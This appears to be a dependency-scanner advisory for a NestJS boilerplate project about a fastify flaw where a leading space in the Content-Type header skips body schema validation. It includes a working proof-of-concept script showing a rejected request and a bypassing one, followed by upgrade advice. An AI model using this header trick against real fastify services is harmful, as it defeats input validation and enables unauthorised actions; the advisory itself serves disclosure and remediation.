Vulnerabilities: 1 via 1 paths

Dependencies: 375

Source: GitHub


high severity
new

Improper Validation of Specified Type of Input

  • Vulnerable module: fastify
  • Introduced through: @nestjs/platform-fastify@11.1.19

Detailed paths

  • Introduced through: nest-boilerplate@MarkNjunge/nest-boilerplate › @nestjs/platform-fastify@11.1.19 › fastify@5.8.4

Overview

fastify is a fast and low overhead web framework for Node.js.

Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input via schema.body.content when a space is prepended to the Content-Type header. An attacker can bypass input validation by sending a request with a leading space in the Content-Type header: the body is still parsed, but schema validation is skipped.

Note: Even though the vulnerability was fixed in version 5.3.2, that version introduced a regression, and a new vulnerability was caused by the fix (CVE-2026-33806). To be fully protected from both the original issue and the regression, upgrade to v5.8.5.

PoC

const fastify = require('fastify')({ logger: false });

fastify.post('/transfer', {
  schema: {
    body: {
      content: {
        'application/json': {
          schema: {
            type: 'object',
            required: ['amount', 'recipient'],
            properties: {
              amount: { type: 'number', maximum: 1000 },
              recipient: { type: 'string', maxLength: 50 },
              admin: { type: 'boolean', enum: [false] }
            },
            additionalProperties: false
          }
        }
      }
    }
  }
}, async (request) => {
  return { processed: true, data: request.body };
});

(async () => {
  await fastify.ready();

  // BLOCKED — normal request with invalid payload
  const res1 = await fastify.inject({
    method: 'POST',
    url: '/transfer',
    headers: { 'content-type': 'application/json' },
    payload: JSON.stringify({ amount: 9999, recipient: 'EVIL', admin: true })
  });
  console.log('Normal:', res1.statusCode);
  // → 400 FST_ERR_VALIDATION

  // BYPASS — single leading space
  const res2 = await fastify.inject({
    method: 'POST',
    url: '/transfer',
    headers: { 'content-type': ' application/json' },
    payload: JSON.stringify({ amount: 9999, recipient: 'EVIL', admin: true })
  });
  console.log('Leading space:', res2.statusCode);
  // → 200 (validation bypassed!)
  console.log('Body:', res2.body);

  await fastify.close();
})();

Remediation

Upgrade fastify to version 5.8.5 or higher.
